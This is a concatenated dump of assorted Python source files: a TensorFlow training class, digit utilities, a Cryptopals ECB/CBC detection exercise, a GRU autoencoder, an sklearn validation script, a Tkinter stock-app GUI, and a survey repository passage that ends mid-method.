tf.equal(prediction, 1))))\n with tf.name_scope('false_negative'):\n fn = tf.reduce_sum(tf.to_int32(tf.logical_and(tf.not_equal(prediction, y), tf.equal(prediction, 0))))\n\n with tf.name_scope('precision'):\n self.precision = tp / (tp + fp)\n with tf.name_scope('recall'):\n self.recall = tp / (tp + fn)\n with tf.name_scope('accuracy'):\n self.accuracy = (tp+tn) / (tp+tn+fp+fn)\n\n with tf.name_scope('f1_score'):\n self.f1_score = 2 * self.precision * self.recall / (self.precision + self.recall)\n\n def _create_optimizer(self):\n '''\n We use Adam optimizer, no need to experiment further.\n :return:\n '''\n with tf.name_scope('optimizer'):\n self.global_step = tf.Variable(0, trainable=False, dtype=tf.int32, name='global_step')\n\n self.lr = tf.train.exponential_decay(learning_rate=self.learning_rate,\n global_step=self.global_step,\n decay_steps=self.decay_steps,\n decay_rate=self.decay_rate,\n name='learning_rate')\n\n # this is needed by tf.contrib.layers.batch_norm():\n # moving averages must be updated, otherwise batch normalization would not work\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n self.optimizer = tf.train.AdamOptimizer(learning_rate=self.lr).minimize(self.loss, global_step=self.global_step)\n\n def create_net(self, arch, learning_rate=0.001, decay_steps=20, decay_rate=0.999):\n '''\n Creates neural network by calling all the functions in the right order.\n :param arch: data structure used by the _create_model(), typically the number and size of hidden layers or keep_prob for dropout\n :param learning_rate:\n :param decay_steps:\n :param decay_rate:\n :return:\n '''\n # clear everything (important for summaries)\n tf.reset_default_graph()\n\n # save for latter\n self.arch = arch\n self.learning_rate = learning_rate\n self.decay_steps = decay_steps\n self.decay_rate = decay_rate\n\n # create network and do all the wiring\n # do not change the order because something might break (it will)\n self._create_placeholders()\n self._create_model(arch)\n self._create_loss()\n self._create_prediction()\n self._calculate_f1_score()\n self._create_optimizer()\n\n # create summary writters for train and validation sets\n self._create_summary_writers()\n\n def _calculate_stats(self, data, batch_size, data_set, sess):\n read_batch = data.read_batch(batch_size, data_set)\n\n stats = np.zeros(5)\n total = 0\n for batch in read_batch:\n size = len(batch)\n feed_dict = self._create_feed_dictionary(batch, is_training=False)\n stats += size * np.array(sess.run([self.loss, self.accuracy, self.precision, self.recall, self.f1_score],\n feed_dict=feed_dict))\n total += size\n stats = stats / total\n names = ['loss', 'accuracy', 'precision', 'recall', 'f1_score']\n return {name: stats[i] for i, name in enumerate(names)}\n\n def train(self, data, batch_size, epochs, skip_steps=20):\n '''\n Train network.\n :param data: data source\n :param batch_size: batch size :)\n :param epochs: number of epochs to train :)\n :param skip_steps: number of steps to make before writing summaries out\n '''\n\n start = time.time()\n with tf.Session() as sess:\n # restore checkpoint if possible\n # if not, initialize variables and start from beginning\n self._create_checkpoint_saver()\n if not self._restore_checkpoint(sess):\n sess.run(tf.global_variables_initializer())\n\n for i in range(epochs):\n train_read_batch = data.read_batch(batch_size, 'train')\n validation_read_batch = data.read_batch(batch_size, 'validation', endless=True)\n for train_batch in train_read_batch:\n train_feed_dict = self._create_feed_dictionary(train_batch, is_training=True)\n # calculate current loss without updating variables\n global_step, train_loss = sess.run([self.global_step, self.loss], feed_dict=train_feed_dict)\n if global_step % skip_steps == 0:\n # write train summary\n train_feed_dict = self._create_feed_dictionary(train_batch, is_training=False)\n train_loss = self._add_summary(sess, train_feed_dict, 'train')\n\n # calculate validation loss and write summary\n validation_feed_dict = self._create_feed_dictionary(next(validation_read_batch), is_training=False)\n validation_loss = self._add_summary(sess, validation_feed_dict, 'validation')\n\n # save checkpoint\n self._save_checkpoint(sess)\n\n # printout losses\n print('[{:05d}/{:.1f} sec] train/validation loss = {:.5f}/{:.5f}'.\\\n format(global_step, time.time() - start, train_loss, validation_loss))\n\n # finally, do the backpropagation and update the variables\n sess.run(self.optimizer, feed_dict=train_feed_dict)\n self._flush_summaries()\n stats = self._calculate_stats(data, batch_size, 'validation', sess)\n return global_step, stats\n\n ################################################################################################################\n #\n # SUMMARY STUFF\n #\n ################################################################################################################\n\n def name_extension(self):\n desc = {type(self).__name__: None}\n desc.update(self.arch)\n desc.update({\n 'lr': str(self.learning_rate),\n 'dr': str(self.decay_rate),\n 'ds': str(self.decay_steps)})\n return os.path.join(*[('{}-{}' if (desc[k] is not None) else '{}').format(k, desc[k]).replace(\" \", \"\").replace('[', '(').replace(']', ')') for k in desc.keys()])\n\n def _create_summaries(self):\n with tf.name_scope('summaries'):\n tf.summary.scalar('lr', self.lr)\n tf.summary.scalar('loss', self.loss)\n tf.summary.scalar('f1_score', self.f1_score)\n tf.summary.scalar('precision', self.precision)\n tf.summary.scalar('recall', self.recall)\n tf.summary.scalar('accuracy', self.accuracy)\n\n self.summary = tf.summary.merge_all()\n\n def _create_summary_writers(self):\n modes = self.modes\n\n # close old summary writers\n if self.summary_writer is not None:\n for mode in modes:\n self.summary_writer[mode].close()\n\n self._create_summaries()\n graph = tf.get_default_graph()\n name_extension = self.name_extension()\n\n self.summary_writer = {mode: tf.summary.FileWriter(os.path.join('graphs', mode, name_extension), graph) for mode in modes}\n\n def _add_summary(self, sess, feed_dict, mode):\n loss, summary, global_step = sess.run([self.loss, self.summary, self.global_step], feed_dict=feed_dict)\n self.summary_writer[mode].add_summary(summary, global_step=global_step)\n return loss\n\n def _flush_summaries(self):\n for mode in self.modes:\n self.summary_writer[mode].flush()\n\n ################################################################################################################\n #\n # CHECKPOINT STUFF\n #\n ################################################################################################################\n\n def _create_checkpoint_saver(self):\n self.checkpoint_namebase = os.path.join('checkpoints', self.name_extension(), 'checkpoint')\n self.checkpoint_path = os.path.dirname(self.checkpoint_namebase)\n os.makedirs(self.checkpoint_path, exist_ok=True)\n print('Checkpoint directory is:', os.path.abspath(self.checkpoint_path))\n\n print('Creating tf.train.Saver()...', end='')\n self.saver = tf.train.Saver()\n print('done')\n return self.saver\n\n def _save_checkpoint(self, sess):\n saver = self.saver\n\n saved_path = saver.save(sess, self.checkpoint_namebase, global_step=self.global_step)\n return saved_path\n\n def _restore_checkpoint(self, sess):\n saver = self.saver\n\n ckpt = tf.train.get_checkpoint_state(self.checkpoint_path)\n print('self.checkpoint_path:', self.checkpoint_path)\n print('ckpt:', ckpt)\n if ckpt and ckpt.model_checkpoint_path:\n print('ckpt.model_checkpoint_path:', ckpt.model_checkpoint_path)\n saver.restore(sess, ckpt.model_checkpoint_path)\n return True\n return False\n\nclass TrainerFF(TrainerNN):\n '''\n A simple feed-forward neural network classifier whose primary purpose is testing of the TrainerNN skeleton.\n\n It assumes that output is an integer denoting index of a class ([0, n) for n classes).\n '''\n\n def __init__(self, input_size):\n self.input_size = input_size\n super().__init__()\n\n def _create_placeholders(self):\n '''\n Creates placeholders for input and dropout parameters.\n :return:\n '''\n with tf.name_scope('input_data'):\n with tf.name_scope('batch'):\n self.X = tf.placeholder(tf.float32, shape=[None, self.input_size], name='X')\n self.y = tf.placeholder(tf.int32, shape=[None], name='y')\n self.keep_prob = tf.placeholder(tf.float32, name='keep_prob')\n self.input_keep_prob = tf.placeholder(tf.float32, name='input_keep_prob')\n self.batch_norm_decay = tf.placeholder(tf.float32, name='batch_norm_decay')\n self.is_training = tf.placeholder(tf.bool, name='is_training')\n return self.X, self.y, self.keep_prob\n\n def _fully_connected_layer_with_dropout_and_batch_norm(self, input_data, num_outputs, use_batch_normalization):\n # skip bias if we are using batch normalization\n if use_batch_normalization:\n # matmul -> batch_norm without scale -> ReLU\n h = tf.contrib.layers.fully_connected(input_data, num_outputs, activation_fn=None, biases_initializer=None)\n h = tf.contrib.layers.batch_norm(h, decay=self.batch_norm_decay, scale=False,\n is_training=self.is_training, activation_fn=tf.nn.relu)\n else:\n h = tf.contrib.layers.fully_connected(input_data, num_outputs)\n h = tf.nn.dropout(h, keep_prob=self.keep_prob)\n return h\n\n def _create_model(self, arch):\n '''\n Creates fully connected network.\n :param arch: list of hidden layer sizes\n '''\n use_batch_normalization = arch['use_batch_norm']\n no_of_layers = arch['no_of_layers']\n hidden_size = arch['hidden_size']\n\n with tf.name_scope('model'):\n with tf.name_scope('input_dropout'):\n h = tf.nn.dropout(self.X, keep_prob=self.input_keep_prob)\n for i in range(no_of_layers):\n with tf.name_scope('fc_layer_{}'.format(i)):\n h = self._fully_connected_layer_with_dropout_and_batch_norm(h, hidden_size, use_batch_normalization)\n\n # linear classifier at the end\n with tf.name_scope('lin_layer'):\n self.logits = tf.contrib.layers.fully_connected(h, 2, activation_fn=None)\n\n def _create_feed_dictionary(self, batch, is_training):\n X, y = batch\n if is_training:\n keep_prob = self.arch['keep_prob']\n input_keep_prob = self.arch['input_keep_prob']\n else:\n keep_prob = 1.0\n input_keep_prob = 1.0\n batch_norm_decay = self.arch['batch_norm_decay']\n\n return {self.X: X,\n self.y: y,\n self.keep_prob: keep_prob,\n self.input_keep_prob: input_keep_prob,\n self.batch_norm_decay: batch_norm_decay,\n self.is_training: is_training}\n\n","sub_path":"repsly_challenge/trainer_nn.py","file_name":"trainer_nn.py","file_ext":"py","file_size_in_byte":15466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"177846729","text":"'''\nOperations dealing with the digits of numbers\n\n@author: ben\n'''\n\nfrom collections import deque\nfrom itertools import islice\n\n#### Manipulate the digits of a number ####\ndef ndigits(N, base=10):\n if base == 10:\n return len(str(N))\n else:\n return len(digits(N, base))\n\ndef digits(N, base=10, use_map=True):\n \"\"\"Returns the digits of N as a list\"\"\"\n if (not use_map) or (base != 10):\n result = []\n while N > 0:\n digit = N % base\n result.append(digit)\n N //= base\n result.reverse()\n else:\n result = [int(c) for c in str(N)]\n return result\n\ndef rotate(N, n):\n \"\"\"Rotates the digits of N by n\"\"\"\n # This likely doesn't need a deque, I'm just lazy\n d = deque(digits(N))\n d.rotate(n)\n return assemble(d)\n\ndef trunc(N, n, base=10):\n \"\"\"Truncates a number by n digits from the right (positive) or left (negative)\"\"\"\n if n > 0:\n ret = N // (base ** n)\n else:\n ret = N % (base ** (ndigits(N) - abs(n)))\n return ret\n\ndef assemble(digits, base=10):\n \"\"\"Assembles a list of digits into a number\"\"\"\n number = 0\n for i in range(len(digits)):\n number += int(digits[-i - 1]) * (base ** i)\n return number\n\n#### Find or generate palindromic numbers ####\ndef is_palindrome(N, base=10, use_map=True):\n for f, b in zip(digits(N, base, use_map), reversed(digits(N, base, use_map))):\n if f != b:\n return False\n return True\n\ndef palindrome_gen():\n \"\"\"Generator for palindromic numbers\"\"\"\n even = False\n n = 0\n old_digits = 1\n while 1:\n n += 1\n if ndigits(n) > old_digits:\n # Retrace after odd numbers\n if not even:\n n //= 10\n # Switch to even/odd\n even = not even\n old_digits = ndigits(n)\n\n if even:\n pal = assemble(digits(n) + list(reversed(digits(n))))\n else:\n pal = assemble(digits(n) + list(reversed(digits(n)))[1:])\n\n yield pal\n\ndef palindrome_list(n):\n \"\"\"Returns a list of the first N Palindromes\"\"\"\n return [pal for pal in islice(palindrome_gen(), n)]\n\n#### Decimal expansions ####\ndef champernowne(Ndigits):\n \"\"\"Return the first Ndigits digits of Champernowne's constant as a list\"\"\"\n ret = []\n i = 1\n while len(ret) < Ndigits:\n ret.extend(digits(i))\n i += 1\n return ret\n\ndef decimal_expand(numerator, denominator, base=10, n_digits=100):\n \"\"\"Return a list containing the decimal representation of a proper fraction\"\"\"\n expansion = []\n for i in range(n_digits):\n n = numerator * (base ** i) // denominator\n expansion.append(digits(n)[-1])\n return expansion\n\n","sub_path":"common/digits.py","file_name":"digits.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"233337203","text":"from tools import *\nimport os\nimport random\n'''\n\nSet 2 Challenge 11\n\nECB/CBC Detection Oracle\n\n'''\n\n\ndef encryption_oracle(plaintext):\n padded = bytearray(os.urandom(random.randint(5, 10)) + plaintext + os.urandom(random.randint(5, 10)))\n padded = bytes(pkcs7_padding(padded, 16))\n\n if random.randint(0, 1):\n print(\"ECB\")\n cipher = Cipher(algorithms.AES(os.urandom(16)), modes.ECB(), backend=default_backend())\n encryptor = cipher.encryptor()\n ciphertext = encryptor.update(padded) + encryptor.finalize()\n else:\n print(\"CBC\")\n cipher = Cipher(algorithms.AES(os.urandom(16)), modes.CBC(os.urandom(16)), backend=default_backend())\n encryptor = cipher.encryptor()\n ciphertext = encryptor.update(padded) + encryptor.finalize()\n\n return ciphertext\n\n\ndef is_ecb(ciphertext, block_size):\n if Counter(get_blocks(ciphertext, block_size)).most_common()[0][1] > 1:\n return True\n else:\n return False\n\nif __name__ == '__main__':\n input = bytes(\"meaningless jibber jabber\", 'ascii')\n\n for i in range(10):\n print(is_ecb(encryption_oracle(input), 16))\n","sub_path":"Set 2/03_ecb_cbc_detection_oracle.py","file_name":"03_ecb_cbc_detection_oracle.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"233371797","text":"\nimport torch\nimport torch.nn as nn\n\nclass GRUBlock(nn.Module):\n def __init__(self, input_dim, hidden_dim, embed_dim, num_layers, dropout):\n super().__init__()\n self.gru = nn.GRU(input_size=input_dim, hidden_size=hidden_dim, num_layers=num_layers, dropout=dropout)\n self.linear = nn.Linear(in_features=hidden_dim, out_features=embed_dim) if hidden_dim != embed_dim else None\n def forward(self, input):\n x, hn = self.gru(input)\n if self.linear is not None:\n x = self.linear(x)\n return x, hn\n\nclass GRUAutoEncoder(nn.Module):\n def __init__(self, input_dim, hidden_dim, embed_dim, num_layers_encoder, num_layers_decoder, dropout=0.1):\n super().__init__()\n self.encoder = GRUBlock(input_dim, hidden_dim, embed_dim, num_layers_encoder, dropout)\n self.decoder = GRUBlock(embed_dim, hidden_dim, input_dim, num_layers_decoder, dropout)\n def forward(self, input):\n x, _ = self.encoder(input)\n x = x[-1, :, :].unsqueeze(0).repeat(input.shape[0], 1, 1)\n x, _ = self.decoder(x)\n return x\n\nclass GRUAutoEncoderAll(nn.Module):\n def __init__(self, input_dim, hidden_dim, embed_dim, num_layers_encoder, num_layers_decoder, dropout=0.1):\n super().__init__()\n assert embed_dim < input_dim\n self.encoder = GRUBlock(input_dim, hidden_dim, embed_dim, num_layers_encoder, dropout)\n self.decoder = GRUBlock(embed_dim, hidden_dim, input_dim, num_layers_decoder, dropout)\n def forward(self, input):\n x, _ = self.encoder(x)\n x, _ = self.decoder(x)\n return x\n","sub_path":"models/rnn/gru.py","file_name":"gru.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"572769351","text":"import json\nimport pickle\nfrom pathlib import Path\n\nimport click\nimport pandas as pd\nfrom sklearn.metrics import accuracy_score, roc_auc_score\n\n\n@click.command()\n@click.option(\"--input-dir\")\n@click.option(\"--input-model-dir\")\ndef validate(input_model_dir: str, input_dir: str):\n input_model_path = Path(input_model_dir)\n input_dataset_path = Path(input_dir)\n\n with open(input_model_path / \"model\", \"rb\") as f:\n model = pickle.load(f)\n\n val_data = pd.read_csv(input_dataset_path / \"val.csv\")\n y_val_data = val_data[['target']]\n x_val_data = val_data.drop(['target'], axis=1)\n\n y = model.predict(x_val_data)\n\n metrics = {\n \"accuracy_score\": accuracy_score(y_val_data.values, y),\n \"roc_auc_score\": roc_auc_score(y_val_data, y)\n }\n\n with open(input_model_path / \"metrics.json\", \"w\") as f:\n json.dump(metrics, f)\n\n\nif __name__ == \"__main__\":\n validate()\n","sub_path":"airflow-ml-dags/images/airflow-validate/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"32611899","text":"from Tkinter import *\nfrom PIL import ImageTk, Image\n\nclass Project(Frame):\n def __init__(self, master):\n Frame.__init__(self)\n self.img = ImageTk.PhotoImage(Image.open('stok.jpg'))\n self.panel = Label(self, image=self.img)\n self.panel.pack(side=\"bottom\", fill=\"both\", expand=\"yes\")\n\n self.button = Button(self, text=\"Home\", fg=\"red\", bg=\"blue\")\n self.button.grid(columnspan=2)\n self.button2 = Button(self, text=\"About Us\", fg=\"red\", bg=\"blue\", command=self.AboutUs)\n self.button2.grid(columnspan=2)\n self.button3 = Button(self, text=\"LogIn\", fg=\"red\", bg=\"blue\", command=self.LogIn)\n self.button3.grid(columnspan=5)\n\n self.pack(side=RIGHT)\n\n def AboutUs(self):\n Frame.__init__(self)\n self.button4 = Button(self, text=\"About Us\", fg=\"red\", bg=\"blue\")\n self.button4.grid(columnspan=2, row=3)\n self.button5 = Button(self, text=\"LogIn\", fg=\"red\", bg=\"blue\", command=self.LogIn)\n self.button5.grid(columnspan=2, row=4)\n\n self.label = Label(self,text=\"This is a simple stock prizes predictor system\\n based Linear Regression analysis method \\n and it uses the technologies like python and mysql database\")\n self.label.grid(row=1, sticky=E)\n\n\n\n self.pack(side=RIGHT)\n\n def LogIn(self):\n Frame.__init__(self)\n\n self.label2 = Label(self, text=\"Please Login In to The system\")\n self.label3 = Label(self, text=\"Username\")\n self.label3.grid(row=0, sticky=E)\n self.label4 = Label(self, text=\"Password\")\n self.label4.grid(row=1, sticky=E)\n self.entry = Entry(self)\n self.entry.grid(row=0, column=1)\n self.entry2 = Entry(self)\n self.entry2.grid(row=1, column=1)\n self.checkbutton = Checkbutton(self, text=\"Keep me logged in\")\n self.checkbutton.grid(columnspan=2)\n self.button6 = Button(self, text=\"Login\",command=self.Login_btn_clicked)\n self.button6.grid(columnspan=2)\n self.button7 = Button(self, text=\"Create an Account\", fg=\"red\", bg=\"blue\", command=self.SignUp)\n self.button7.grid(columnspan=4)\n\n\n self.button8 = Button(self, text=\"Home\", fg=\"red\", bg=\"blue\")\n self.button8.grid(columnspan=2)\n self.button9 = Button(self, text=\"About Us\", fg=\"red\", bg=\"blue\", command=self.AboutUs)\n self.button9.grid(columnspan=2)\n\n self.pack(side=RIGHT)\n\n def SignUp(self):\n Frame.__init__(self)\n\n self.label5 = Label(self, text=\"Enter the credentials\")\n self.label6 = Label(self, text=\"Username\")\n self.label7 = Label(self, text=\"Name\")\n self.label8 = Label(self, text=\"UIDAI No.\")\n self.label9 = Label(self, text=\"Email Id\")\n self.label10 = Label(self, text=\"Residential Address\")\n self.label11 = Label(self, text=\"Permanant Address\")\n self.label12 = Label(self, text=\"Mobile No.\")\n self.label13 = Label(self, text=\"Company Name\")\n self.label14 = Label(self, text=\"Password\")\n self.label15 = Label(self, text=\"Confirm Password\")\n self.entry3 = Entry(self)\n self.entry4 = Entry(self)\n self.entry5 = Entry(self)\n self.entry6 = Entry(self)\n self.entry7 = Entry(self)\n self.entry8 = Entry(self)\n self.entry9 = Entry(self)\n self.entry10 = Entry(self)\n self.entry11 = Entry(self, show=\"*\")\n self.entry12 = Entry(self, show=\"*\")\n self.label5.grid(row=1, sticky=E)\n self.label6.grid(row=2, sticky=E)\n self.label7.grid(row=3, sticky=E)\n self.label8.grid(row=4, sticky=E)\n self.label9.grid(row=5, sticky=E)\n self.label10.grid(row=6, sticky=E)\n self.label11.grid(row=7, sticky=E)\n self.label12.grid(row=8, sticky=E)\n self.label13.grid(row=9, sticky=E)\n self.label14.grid(row=10,sticky=E)\n self.label15.grid(row=11,sticky=E)\n self.entry3.grid(row=2, column=2)\n self.entry4.grid(row=3, column=2)\n self.entry5.grid(row=4, column=2)\n self.entry6.grid(row=5, column=2)\n self.entry7.grid(row=6, column=2)\n self.entry8.grid(row=7, column=2)\n self.entry9.grid(row=8, column=2)\n self.entry10.grid(row=9, column=2)\n self.entry11.grid(row=10, column=2)\n self.entry12.grid(row=11, column=2)\n self.checkbox2 = Checkbutton(self, text=\"I Agree Terms and Conditions \")\n self.checkbox2.grid(columnspan=2)\n\n self.button10 = Button(self, text=\"Create an Account\",bg=\"blue\",fg=\"red\",command=self.signup_btn_clicked)\n self.button10.grid(columnspan=3)\n\n self.button11 = Button(self, text=\"Home\", fg=\"red\", bg=\"blue\")\n self.button11.grid(columnspan=2)\n self.button12 = Button(self, text=\"About Us\", fg=\"red\", bg=\"blue\", command=self.AboutUs)\n self.button12.grid(columnspan=2)\n\n\n self.pack(side=RIGHT)\n\n def signup_btn_clicked(self):\n\n Frame.__init__(self)\n\n addhim = open(\"User-Signup.txt\", \"w\")\n addhim.write(\"\\nUsername:\" + self.entry3.get())\n addhim.write(\"\\nname :\" + self.entry4.get())\n addhim.write(\"\\nUIDAI No\" + self.entry5.get())\n addhim.write(\"\\nEmail Id\" + self.entry6.get())\n addhim.write(\"\\nResidential Address :\" + self.entry7.get())\n addhim.write(\"\\nPermanant Address :\" + self.entry8.get())\n addhim.write(\"\\nMobile No. :\" + self.entry9.get())\n addhim.write(\"\\nCompany Name :\" + self.entry10.get())\n addhim.write(\"\\nPassword :\" + self.entry11.get())\n addhim.write(\"\\nRetype Passsword :\" + self.entry12.get())\n addhim.close()\n\n self.button13 = Button(self, text=\"About Us\", fg=\"red\", bg=\"blue\", command=self.AboutUs)\n self.button13.grid(columnspan=2)\n self.button14 = Button(self, text=\"Login\", fg=\"red\", bg=\"blue\", command=self.LogIn)\n self.button14.grid(columnspan=2)\n\n self.pack()\n\n def Login_btn_clicked(self):\n Frame.__init__(self)\n\n adduser = open(\"User.txt\", \"w\")\n adduser.write(\"User ID: \" + self.entry.get())\n adduser.write(\"\\nUser Password: \" + self.entry2.get())\n adduser.close()\n\n self.button13 = Button(self, text=\"Dashboard\",command=self.Dashboard())\n self.button13.grid(comunspan=2)\n self.pack()\n\n\n def Dashboard(self):\n Frame.__init__(self)\n self.pack()\n\n\n\n\n\nroot = Tk()\npr = Project(root)\nroot.mainloop()\n","sub_path":"pred.py","file_name":"pred.py","file_ext":"py","file_size_in_byte":6441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"31004138","text":"from werkzeug.exceptions import NotFound\n\nfrom microsetta_private_api import localization\nfrom microsetta_private_api.repo.base_repo import BaseRepo\nfrom microsetta_private_api.model.survey_template import SurveyTemplate, \\\n SurveyTemplateLinkInfo\nfrom microsetta_private_api.model.survey_template_group import \\\n SurveyTemplateGroup\nfrom microsetta_private_api.model.survey_template_question import \\\n SurveyTemplateQuestion\nfrom microsetta_private_api.model.survey_template_trigger import \\\n SurveyTemplateTrigger\nimport copy\nimport secrets\n\nfrom microsetta_private_api.repo.sample_repo import SampleRepo\n\n\nclass SurveyTemplateRepo(BaseRepo):\n\n VIOSCREEN_ID = 10001\n SURVEY_INFO = {\n 1: SurveyTemplateLinkInfo(\n 1,\n \"Primary Questionnaire\",\n \"1.0\",\n \"local\"\n ),\n 2: SurveyTemplateLinkInfo(\n 2,\n \"Pet Information\",\n \"1.0\",\n \"local\"\n ),\n 3: SurveyTemplateLinkInfo(\n 3,\n \"Fermented Foods Questionnaire\",\n \"1.0\",\n \"local\"\n ),\n 4: SurveyTemplateLinkInfo(\n 4,\n \"Surfer Questionnaire\",\n \"1.0\",\n \"local\"\n ),\n 5: SurveyTemplateLinkInfo(\n 5,\n \"Personal Microbiome Information\",\n \"1.0\",\n \"local\"\n ),\n 6: SurveyTemplateLinkInfo(\n 6,\n \"COVID-19 Questionnaire\",\n \"1.0\",\n \"local\"\n ),\n VIOSCREEN_ID: SurveyTemplateLinkInfo(\n VIOSCREEN_ID,\n \"Vioscreen Food Frequency Questionnaire\",\n \"1.0\",\n \"remote\"\n )\n }\n\n def __init__(self, transaction):\n super().__init__(transaction)\n\n def list_survey_ids(self):\n with self._transaction.cursor() as cur:\n cur.execute(\"SELECT DISTINCT survey_id from surveys\")\n rows = cur.fetchall()\n return [x[0] for x in rows]\n\n @staticmethod\n def get_survey_template_link_info(survey_id):\n return copy.deepcopy(SurveyTemplateRepo.SURVEY_INFO[survey_id])\n\n def get_survey_template(self, survey_id, language_tag):\n tag_to_col = {\n localization.EN_US: \"survey_question.american\",\n localization.EN_GB: \"survey_question.british\",\n localization.ES_MX: \"survey_question.spanish\"\n }\n\n if language_tag not in tag_to_col:\n raise NotFound(\"Survey localization unavailable: %s\" %\n language_tag)\n\n with self._transaction.cursor() as cur:\n\n cur.execute(\n \"SELECT count(*) FROM surveys WHERE survey_id=%s\",\n (survey_id,)\n )\n if cur.fetchone()[0] == 0:\n raise NotFound(\"No such survey\")\n\n cur.execute(\n \"SELECT \"\n \"group_questions.survey_group, \"\n \"survey_question.survey_question_id, \" +\n tag_to_col[language_tag] + \", \" +\n \"survey_question.question_shortname, \"\n \"survey_question_response_type.survey_response_type \"\n \"FROM \"\n \"surveys \"\n \"LEFT JOIN group_questions ON \"\n \"surveys.survey_group = group_questions.survey_group \"\n \"LEFT JOIN survey_question ON \"\n \"group_questions.survey_question_id = \"\n \"survey_question.survey_question_id \"\n \"LEFT JOIN survey_question_response_type ON \"\n \"survey_question.survey_question_id = \"\n \"survey_question_response_type.survey_question_id \"\n \"WHERE surveys.survey_id = %s AND \"\n \"survey_question.retired = false \"\n \"ORDER BY group_questions.survey_group, \"\n \"group_questions.display_index\",\n (survey_id,))\n\n rows = cur.fetchall()\n\n all_groups = []\n cur_group_id = None\n cur_questions = None\n\n for r in rows:\n group_id = r[0]\n question_id = r[1]\n localized_text = r[2]\n short_name = r[3]\n response_type = r[4]\n if group_id != cur_group_id:\n if cur_group_id is not None:\n group_localized_text = self._get_group_localized_text(\n cur_group_id,\n language_tag)\n all_groups.append(SurveyTemplateGroup(\n group_localized_text,\n cur_questions))\n cur_group_id = group_id\n cur_questions = []\n\n responses = self._get_question_valid_responses(question_id,\n language_tag)\n triggers = self._get_question_triggers(question_id)\n\n # Quick fix to correctly sort country names in Spanish\n if language_tag == localization.ES_MX and \\\n (question_id == 110 or question_id == 148):\n responses[1:len(responses)] = \\\n sorted(responses[1:len(responses)])\n\n question = SurveyTemplateQuestion(question_id,\n localized_text,\n short_name,\n response_type,\n responses,\n triggers)\n cur_questions.append(question)\n\n if cur_group_id is not None:\n group_localized_text = self._get_group_localized_text(\n cur_group_id,\n language_tag)\n all_groups.append(SurveyTemplateGroup(\n group_localized_text,\n cur_questions))\n\n return SurveyTemplate(survey_id, language_tag, all_groups)\n\n def _get_group_localized_text(self, group_id, language_tag):\n tag_to_col = {\n localization.EN_US: \"american\",\n localization.EN_GB: \"british\",\n localization.ES_MX: \"spanish\"\n }\n with self._transaction.cursor() as cur:\n cur.execute(\"SELECT \" +\n tag_to_col[language_tag] + \" \" +\n \"FROM survey_group \"\n \"WHERE \"\n \"group_order = %s\", (group_id,))\n row = cur.fetchone()\n if row is None:\n return None\n return row[0]\n\n def _get_question_valid_responses(self, survey_question_id, language_tag):\n tag_to_col = {\n localization.EN_US: \"survey_response.american\",\n localization.EN_GB: \"survey_response.british\",\n localization.ES_MX: \"survey_response.spanish\",\n }\n\n with self._transaction.cursor() as cur:\n cur.execute(\"SELECT \" +\n tag_to_col[language_tag] + \" \"\n \"FROM \"\n \"survey_question_response \"\n \"LEFT JOIN \"\n \"survey_response \"\n \"ON \"\n \"survey_question_response.response = \"\n \"survey_response.american \"\n \"WHERE \"\n \"survey_question_id = %s \"\n \"ORDER BY \"\n \"display_index\", (survey_question_id,))\n return [x[0] for x in cur.fetchall()]\n\n def _get_question_triggers(self, survey_question_id):\n with self._transaction.cursor() as cur:\n cur.execute(\"SELECT triggering_response, triggered_question \"\n \"FROM \"\n \"survey_question_triggers \"\n \"WHERE \"\n \"survey_question_id = %s \", (survey_question_id,))\n\n rows = cur.fetchall()\n return [SurveyTemplateTrigger(x[0], x[1]) for x in rows]\n\n def create_vioscreen_id(self, account_id, source_id,\n vioscreen_ext_sample_id):\n with self._transaction.cursor() as cur:\n # This transaction scans for existing IDs,\n # then generates a new ID if none exist\n # To prevent workers from seeing stale state,\n # and thus each generating multiple new IDs\n # in the case of multiple workers,\n # we lock the vioscreen_registry table\n self._transaction.lock_table(\"vioscreen_registry\")\n # test if an existing ID is available\n existing = self.get_vioscreen_id_if_exists(account_id, source_id,\n vioscreen_ext_sample_id)\n if existing is None:\n vioscreen_id = secrets.token_hex(8)\n # Put a survey with status -1 into ag_login_surveys\n cur.execute(\"INSERT INTO ag_login_surveys(\"\n \"ag_login_id, \"\n \"survey_id, \"\n \"vioscreen_status, \"\n \"source_id) \"\n \"VALUES(%s, %s, %s, %s)\",\n (account_id, vioscreen_id, -1, source_id))\n # Immediately attach that survey to the specified sample\n sample_repo = SampleRepo(self._transaction)\n s = sample_repo.get_sample(account_id,\n source_id,\n vioscreen_ext_sample_id)\n\n if s is None:\n raise KeyError(f\"{vioscreen_ext_sample_id} does not exist\")\n\n cur.execute(\"INSERT INTO source_barcodes_surveys \"\n \"(barcode, survey_id) \"\n \"VALUES(%s, %s)\", (s.barcode, vioscreen_id))\n\n # And add it to the registry to keep track of the survey if\n # user quits out then wants to resume the survey.\n cur.execute(\"INSERT INTO vioscreen_registry(\"\n \"account_id, source_id, sample_id, vio_id) \"\n \"VALUES(%s, %s, %s, %s)\",\n (account_id, source_id, vioscreen_ext_sample_id,\n vioscreen_id))\n else:\n vioscreen_id = existing\n return vioscreen_id\n\n def get_vioscreen_id_if_exists(self, account_id, source_id,\n vioscreen_ext_sample_id):\n \"\"\"Obtain a vioscreen ID if it exists\"\"\"\n with self._transaction.cursor() as cur:\n # Find an active vioscreen survey for this account+source+sample\n # (deleted surveys are not active)\n cur.execute(\"SELECT vio_id FROM vioscreen_registry WHERE \"\n \"account_id=%s AND \"\n \"source_id=%s AND \"\n \"sample_id=%s AND \"\n \"deleted=false\",\n (account_id, source_id, vioscreen_ext_sample_id))\n rows = cur.fetchall()\n if rows is None or len(rows) == 0:\n return None\n else:\n return rows[0][0]\n\n def 